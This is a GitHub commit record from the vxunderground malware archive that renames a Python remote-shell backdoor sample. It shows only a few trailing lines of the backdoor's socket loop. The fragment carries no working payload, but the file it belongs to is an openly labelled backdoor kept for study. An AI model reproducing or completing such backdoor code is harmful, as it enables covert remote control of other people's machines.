Rename Backdoor.Python.RShell to Python.Backdoor.d00r.a

This commit is contained in:
vxunderground 2020-10-24 16:10:45 -05:00 committed by GitHub
parent 57b2bb62d8
commit 9d87cb2288
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -118,4 +118,4 @@ while run:
else: else:
try: sock.send("") try: sock.send("")
except: time.sleep(1) except: time.sleep(1)
else: sock.shutdown(2) else: sock.shutdown(2)